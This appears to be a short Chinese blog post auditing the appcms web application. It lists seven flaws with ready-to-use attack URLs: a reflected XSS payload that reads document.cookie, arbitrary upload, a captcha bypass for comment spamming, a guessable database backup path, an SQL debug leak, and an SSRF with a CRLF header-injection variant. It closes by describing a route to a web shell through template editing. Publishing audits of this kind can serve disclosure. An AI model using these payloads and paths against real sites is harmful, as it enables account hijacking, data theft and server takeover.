代码审计之 appcms通用漏洞

1.回调接口反射XSS
/upload/callback.php?params=111%27);%3C/script%3E%3Cscript%3Ealert(document.cookie);testsub(%27
2.任意app上传
/upload/upload_form.php?params=test&v=1111 #访问后需要构造提交表单或者发requests
添加 <input name=”Submit” value=”提交” type=”submit”>
3.模版xss,直接访问到模版文件,也可以触发xss
4.验证码缺陷
appcms中使用的验证码都是前端刷新、可以拦截前端验证码请求,一直使用旧的验证码,比如评论功能,可以遍历会话刷评论。
5.固定数据库备份文件名
只要备份了数据库,都是固定的文件名,直接下载数据库备份了就,比如/backup/appcms_admin_list_0.sql
6.sql执行调试接口泄漏
/admin/admin_user.php?ajax=json 访问众多后台文件 axaj=json 都会返回当前执行的sql语句。
7.轻微SSRF
先把 http://0535code.com/wp-content/themes/d8/img/logo.png 做base64编码,然后放入url中;
/pic.php?url=aHR0cDovLzA1MzVjb2RlLmNvbS93cC1jb250ZW50L3RoZW1lcy9kOC9pbWcvbG9nby5wbmc=&type=png
绕过方式 http://0535code.com/?1.png 进行编码,也可能存在HTTP响应拆分噢、
/pic.php?url=aHR0cDovL3YucXEuY29tL3gvc2VhcmNoLz9xPTEucG5n&type=png%0A%0Dreferer:http://0535code.com
######################################################################
getshell,通过上面几种途径都可以噢、只要可以登陆后台,后台有编辑模版功能,就可以getshell了、、、

发表评论

电子邮件地址不会被公开。 必填项已用*标注